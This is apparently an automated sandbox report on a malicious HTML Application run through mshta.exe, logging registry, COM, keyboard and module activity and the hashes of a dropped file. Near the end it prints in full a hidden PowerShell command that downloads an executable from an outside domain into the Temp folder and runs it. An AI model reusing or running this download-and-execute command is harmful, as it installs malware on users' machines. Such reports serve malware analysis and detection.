| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup, value_name = Print_Background |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x75584680 |
|
1 | |
| System | Get Cursor | x_out = 1248, y_out = 501 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x75583ed5 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 1183792 |
|
1 | |
| Window | Set Attribute | index = 18446744073709551595, new_long = 1183792 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x726e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleacc.dll, function = LresultFromObject, address_out = 0x726e2663 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1248, y_out = 501 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 1248, y_out = 501 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Info | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x6d270000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x6d270000 |
|
1 | |
| System | Get Time | type = Ticks, time = 108311 |
|
3 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 108311 |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 108311 |
|
2 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x754d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x76f5fb7d |
|
2 | |
| Module | Get Filename | module_name = IEXPLORE.EXE, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x754e4907 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x754e48ef |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x754e469d |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ole32.dll, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7673632b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x76739d0b |
|
1 | |
| COM | Create | interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Environment | Get Environment String | name = JS_PROFILER |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 108358 |
|
2 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x75584642 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ole32.dll, base_address = 0x766f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x76700782 |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x767254ad |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = IEXPLORE.EXE, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\system32\mShta.exe, size = 261 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x75810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x75831e46 |
|
1 | |
| Process | Create | process_name = C:\Windows/system32/WindowsPowerShell/v1.0/powershell.exe, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 108654 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
2 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = oleaut32.dll, base_address = 0x75580000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VariantClear, address_out = 0x75583eae |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Window | Set Attribute | index = 18446744073709551595, new_long = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 282 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x76cf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wininet.dll, function = InternetUnlockRequestFile, address_out = 0x76d37457 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\oleaut32.dll, base_address = 0x75580000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 201, address_out = 0x75584af8 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll, base_address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = mshtml.dll, base_address = 0x63150000 |
|
1 | |
| System | Get Time | type = Ticks, time = 108295 |
|
1 | |
| System | Get Time | type = Ticks, time = 108311 |
|
3 | |
| System | Get Time | type = Ticks, time = 108639 |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe');C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:19, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:32 |
| Information | Value |
|---|---|
| PID | 0xb44 |
| Parent PID | 0xa18 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B48
0x
B60
0x
B64
0x
B68
0x
B6C
0x
B70
0x
B74
0x
B78
0x
B7C
0x
B80
0x
B8C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\temp\lambdoidtegument.exe | 232.00 KB (237568 bytes) |
MD5:
437efd63bf864669ef4312750c25c462
SHA1: 247f0b1576c24e50830f6ee326dce494c6ba478d SHA256: c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
